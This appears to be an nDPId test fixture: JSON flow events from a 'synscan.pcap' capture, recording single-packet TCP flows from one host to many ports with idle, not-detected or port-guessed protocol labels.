-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 